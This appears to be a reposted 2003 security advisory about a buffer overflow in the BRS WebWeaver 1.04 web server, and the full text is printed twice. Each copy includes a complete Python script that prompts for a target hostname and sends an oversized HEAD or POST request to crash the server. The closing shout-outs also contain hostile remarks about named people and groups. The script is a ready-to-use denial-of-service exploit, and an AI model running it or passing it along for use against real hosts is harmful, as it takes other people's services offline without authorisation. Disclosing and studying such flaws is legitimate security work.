=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: POST and HEAD Overflaws
product: BRS WebWeaver v1.04 and prior [ i guess ]
vendor: www.brswebweaver.com
risk: high
date: 05/25/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/025.en.txt
http://f0kp.iplus.ru/bz/025.ru.txt
contact email: euronymous (at) iplus (dot) ru [email concealed]
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
more b0fs in Webweaver. sending 32700 charz in POST
or HEAD request will crash http server.
when send 32699 charz with fadvWWhtdos.py, webweaver
print 403 error. when sending >= 32700 charz, server
will print `Unable to insert string' error and you
have to restart it.
}------- start of fadvWWhtdos.py ---------------{
#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fadvWWhtdos.py ---------------{
shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================
topic: BRS WebWeaver: POST and HEAD Overflaws
product: BRS WebWeaver v1.04 and prior [ i guess ]
vendor: www.brswebweaver.com
risk: high
date: 05/25/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/025.en.txt
http://f0kp.iplus.ru/bz/025.ru.txt
contact email: euronymous (at) iplus (dot) ru [email concealed]
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
more b0fs in Webweaver. sending 32700 charz in POST
or HEAD request will crash http server.
when send 32699 charz with fadvWWhtdos.py, webweaver
print 403 error. when sending >= 32700 charz, server
will print `Unable to insert string' error and you
have to restart it.
}------- start of fadvWWhtdos.py ---------------{
#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fadvWWhtdos.py ---------------{
shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================
[ reply ]